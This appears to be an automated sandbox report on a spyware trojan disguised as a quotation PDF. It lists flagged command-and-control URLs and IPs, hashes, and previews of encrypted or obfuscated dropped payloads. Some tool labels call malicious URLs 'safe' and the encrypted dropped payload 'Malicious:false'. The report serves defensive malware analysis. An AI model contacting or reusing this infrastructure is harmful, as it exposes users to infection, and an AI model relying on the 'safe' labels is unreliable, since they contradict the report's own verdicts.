                                              http://www.070002018.xyz/zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bionanosolutions.info/i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKhtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.acc888ommodate.xyz/aqil/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabRMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://kb.fastpanel.direct/troubleshoot/RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000043CA000.00000004.10000000.00040000.00000000.sdmp, RMActivate_isv.exe, 0000000B.00000002.3138038480.0000000006420000.00000004.00000800.00020000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.000000000369A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.bt.cn/?from=404RMActivate_isv.exe, 0000000B.00000002.3135956729.00000000040A6000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003376000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2000496930.0000000028E66000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ac.ecosia.org/autocomplete?q=RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.mdpc7.topxvYhLzczmazJ.exe, 0000000C.00000002.3137237939.00000000052A4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssRMActivate_isv.exe, 0000000B.00000002.3135956729.0000000004BA4000.00000004.10000000.00040000.00000000.sdmp, xvYhLzczmazJ.exe, 0000000C.00000002.3135190589.0000000003E74000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RMActivate_isv.exe, 0000000B.00000002.3138251164.0000000007EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  13.248.169.48
                                                                  		www.tals.xyzUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  161.97.142.144
                                                                  		www.070002018.xyzUnited States
                                                                  		51167CONTABODEtrue
                                                                  47.76.213.197
                                                                  		www.ytsd88.topUnited States
                                                                  		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZtrue
                                                                  20.2.36.112
                                                                  		mmd.dnsmmd.comUnited States
                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                  176.117.73.104
                                                                  		www.bionanosolutions.infoUkraine
                                                                  		50643LURENET-ASUAtrue
                                                                  203.161.46.205
                                                                  		www.startvin.topMalaysia
                                                                  		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                  176.32.38.130
                                                                  		www.acc888ommodate.xyzRussian Federation
                                                                  		51659ASBAXETRUtrue
                                                                  107.167.84.42
                                                                  		cssa.auctionUnited States
                                                                  		53755IOFLOODUStrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1557571
                                                                  Start date and time:2024-11-18 13:10:57 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 18s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:17
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Quotation request -30112024_pdf.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@15/8
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 92%
                                                                  • Number of executed functions: 65
                                                                  • Number of non-executed functions: 295
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: Quotation request -30112024_pdf.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  13.248.169.48Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.wajf.net/dkz5/
                                                                  rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                  • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                  dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                  • www.extrem.tech/ikn1/
                                                                  Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sonoscan.org/ew98/
                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                  • www.hopeisa.live/v0jl/
                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                  • www.layerzero.cfd/8f5m/
                                                                  rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.reviewpro.shop/aclh/
                                                                  FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                  • www.fitlook.shop/34uy/
                                                                  Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM
                                                                  Order.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sonoscan.org/ew98/
                                                                  161.97.142.144DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003794.xyz/mpp6/
                                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                  • www.030002350.xyz/wrcq/
                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003452.xyz/7nfi/
                                                                  AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002059.xyz/er88/
                                                                  ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003582.xyz/7zm7/
                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002128.xyz/knx2/
                                                                  56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/o2wj/
                                                                  H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/l9k5/
                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002304.xyz/jkxr/

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  mmd.dnsmmd.comItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                  • 20.2.36.112

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  VODAFONE-TRANSIT-ASVodafoneNZLtdNZpennicle.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                  • 47.79.48.182
                                                                  https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.htmlGet hashmaliciousUnknownBrowse
                                                                  • 47.79.48.182
                                                                  https://sos-at-vie-1.exo.io/bucketrack/dir62/final/prove-not-robot-check.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                  • 47.79.48.182
                                                                  meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                                                  • 47.76.235.18
                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 49.224.236.63
                                                                  speedtest-cli.arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 118.92.187.4
                                                                  xX1k6Ghe8s.elfGet hashmaliciousMiraiBrowse
                                                                  • 47.76.171.133
                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 118.95.51.127
                                                                  bin.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 121.75.97.174
                                                                  drivers-v1.ps1Get hashmaliciousLummaCBrowse
                                                                  • 47.79.48.189
                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaCBrowse
                                                                  • 13.107.246.45
                                                                  http://login.nojustgive.com/ueAQYUzzGet hashmaliciousHTMLPhisherBrowse
                                                                  • 20.189.173.13
                                                                  Benefits_Update_2024.pdfGet hashmaliciousUnknownBrowse
                                                                  • 23.101.59.196
                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 13.89.179.9
                                                                  Benefits_Update_2024.pdfGet hashmaliciousUnknownBrowse
                                                                  • 23.101.59.196
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 13.107.246.45
                                                                  https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDFGet hashmaliciousUnknownBrowse
                                                                  • 13.107.246.45
                                                                  I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msgGet hashmaliciousMint StealerBrowse
                                                                  • 52.109.28.47
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 13.107.246.45
                                                                  https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235Get hashmaliciousUnknownBrowse
                                                                  • 13.73.248.4
                                                                  AMAZON-02UShttps://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gifGet hashmaliciousUnknownBrowse
                                                                  • 44.230.175.247
                                                                  900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                  • 52.216.214.9
                                                                  https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                  • 13.35.58.119
                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 3.170.115.43
                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                  • 18.141.10.107
                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                  • 18.141.10.107
                                                                  harm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 54.171.230.55
                                                                  http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                  • 52.24.205.146
                                                                  http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                  • 54.244.144.214
                                                                  http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962Get hashmaliciousUnknownBrowse
                                                                  • 35.76.5.47
                                                                  CONTABODE4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                                                  • 80.241.214.102
                                                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  • 144.91.79.54
                                                                  BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                  • 161.97.142.144
                                                                  https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                  • 207.180.225.113
                                                                  Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                                                  • 144.91.79.54
                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                  • 161.97.142.144
                                                                  75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                  • 5.189.178.202
                                                                  SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  • 144.91.79.54

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\Z9508-2L1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\RMActivate_isv.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:modified
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1215420383712111
                                                                  Encrypted:false
                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\aut77F7.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):286720
                                                                  Entropy (8bit):7.995046245800451
                                                                  Encrypted:true
                                                                  SSDEEP:6144:uNXGV4dF2FIBEVrex68/do6m0YvasscvQ64QJsw5i:uNVAk68/dSsssc9rM
                                                                  MD5:5F7DFFB148379894337CF6F62DE296B3
                                                                  SHA1:D653510B08B089DDF1AEF492B414436A587D2B82
                                                                  SHA-256:591D3A0D4A3A93EDEA64D1270BAFBB6887096E0539B0009DD01EC770064017DE
                                                                  SHA-512:729951CC46CC15A3CF13A04553C9309959187DA6DAE28BCB6A209C1B90710000DCB69D1B104ABE63DDF152D2AE054CF9294655522945001577E09B9F6EB2552B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...M[WRUWQDS..NW.DE0XHNGsEJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBS.MXW\J._D.[.o.T.... '4.58))029m;6<;<%d17r<";d,^x....(%"+l^YG|WRUSQDS+SG.h$".e()..%-.T...w80.O...o25.M...8/..Z&"{.%.TMXWRUSQ..RR.VTD.a..NG3EJFNB.TOY\S^SQ.WRRNWUDE0X.ZG3EZFNB3PMXW.USADSRPNWSDE0XHNG5EJFNBSTM8SRUQQDSRRNUU..0XXNG#EJFNRST]XWRUSQTSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3Ed2+:'TMX..QSQTSRR.SUDU0XHNG3EJFNBSTMxWR5SQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRR

                                                                  C:\Users\user\AppData\Local\Temp\aut7837.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14442
                                                                  Entropy (8bit):7.636644896371412
                                                                  Encrypted:false
                                                                  SSDEEP:384:nTYzRyE1ZC/UQ9FIntJ3ObN8+zg4z0/FZy/PjMDHL:nAL1RQ9Fc36NhgEy+XjMDHL
                                                                  MD5:DBBBDC9512FD01DC5B53896A961711E5
                                                                  SHA1:461B4D4F09C2DFD545C5DE4C3EE8BAA813BD2B40
                                                                  SHA-256:4ACD93AF7ED747B6ED606C340A06D13EE439CABC17A8849C4DAF9B2146FCC836
                                                                  SHA-512:A5CF5011975D070C126BA582CB5E910FBF0A4EDDF29BCA8334250C7D73062AC4F37585137D9D5E2AE5A31E48BF195457812D4C40680519B17D1AA3DEDBA07546
                                                                  Malicious:false
                                                                  Preview:EA06..0..[-w9..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                  C:\Users\user\AppData\Local\Temp\leucoryx

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):143378
                                                                  Entropy (8bit):2.993068678381446
                                                                  Encrypted:false
                                                                  SSDEEP:1536:lC6Hbc8Z/kCXWqb64Micg9+VotMclKrng51U:10ejtm
                                                                  MD5:B697D9071D910E9FD4A7AD4305BFA855
                                                                  SHA1:01D4484834A7DE44A3BE3470722AB2154E733572
                                                                  SHA-256:027DCEDD9B993A616FECC8241F765B8B10A4AEAC601B704760E3AF7E4100EA3C
                                                                  SHA-512:E40DC04D28EB9C0769FAF21F21B64AAB2BC9D340D081438D521FFC1A27D9BA4CF03DF60006477535371DBFD9249B12437F461F31310669781394AF0B71B839B3
                                                                  Malicious:false
                                                                  Preview:dlks0dlksxdlks5dlks5dlks8dlksbdlksedlkscdlks8dlks1dlksedlkscdlkscdlkscdlks0dlks2dlks0dlks0dlks0dlks0dlks5dlks6dlks5dlks7dlksbdlks8dlks6dlksbdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlks4dlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlks6dlksbdlksadlks7dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlks8dlksbdlks8dlks6dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks8dlksadlksbdlks9dlks6dlks5dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks8dlkscdlksbdlksadlks6dlkscdlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks8dlksedlksbdlks8dlks3dlks3dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlks5dlks9dlks0dlksbdlks9dlks3dlks2dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks4dlksddlks9dlks2dlksbdlksadlks2dlksedlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9dlks5dlks5dlks9dlks4dlksbdlks8dlks6dlks4dlks0dlks0dlks0dlks0dlks0dlks0dlks6dlks6dlks8dlks9

                                                                  C:\Users\user\AppData\Local\Temp\selectee

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):286720
                                                                  Entropy (8bit):7.995046245800451
                                                                  Encrypted:true
                                                                  SSDEEP:6144:uNXGV4dF2FIBEVrex68/do6m0YvasscvQ64QJsw5i:uNVAk68/dSsssc9rM
                                                                  MD5:5F7DFFB148379894337CF6F62DE296B3
                                                                  SHA1:D653510B08B089DDF1AEF492B414436A587D2B82
                                                                  SHA-256:591D3A0D4A3A93EDEA64D1270BAFBB6887096E0539B0009DD01EC770064017DE
                                                                  SHA-512:729951CC46CC15A3CF13A04553C9309959187DA6DAE28BCB6A209C1B90710000DCB69D1B104ABE63DDF152D2AE054CF9294655522945001577E09B9F6EB2552B
                                                                  Malicious:false
                                                                  Preview:...M[WRUWQDS..NW.DE0XHNGsEJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBS.MXW\J._D.[.o.T.... '4.58))029m;6<;<%d17r<";d,^x....(%"+l^YG|WRUSQDS+SG.h$".e()..%-.T...w80.O...o25.M...8/..Z&"{.%.TMXWRUSQ..RR.VTD.a..NG3EJFNB.TOY\S^SQ.WRRNWUDE0X.ZG3EZFNB3PMXW.USADSRPNWSDE0XHNG5EJFNBSTM8SRUQQDSRRNUU..0XXNG#EJFNRST]XWRUSQTSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3Ed2+:'TMX..QSQTSRR.SUDU0XHNG3EJFNBSTMxWR5SQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRRNWUDE0XHNG3EJFNBSTMXWRUSQDSRR

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.217859133980473
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Quotation request -30112024_pdf.exe
                                                                  File size:970'257 bytes
                                                                  MD5:8a44b6f23ceba13203e4dc3fb33aea3c
                                                                  SHA1:1fd1641755f1df2d11f42e5176ebcf2c7684661a
                                                                  SHA256:2166b87c378747df98dcbbb089b0d3a21cf5631e999e68447e804c4b48d25efb
                                                                  SHA512:979d33893e066231d3f4cee669560a273b6ae2a8ffb5ea6988b2176909284e42e15e42c6816219710d603c1a466b531d4d171e7f3065cd67a1a8359fb111783e
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCKUJFf4C6iewesl:7JZoQrbTFZY1iaCKUTRpnl
                                                                  TLSH:C625D022F5D68036C2B323B19E7EF76A963D79360336D19727C82E315EA05416B29733
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                  File Icon

                                                                  Icon Hash:1733312925935517

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4165c1
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
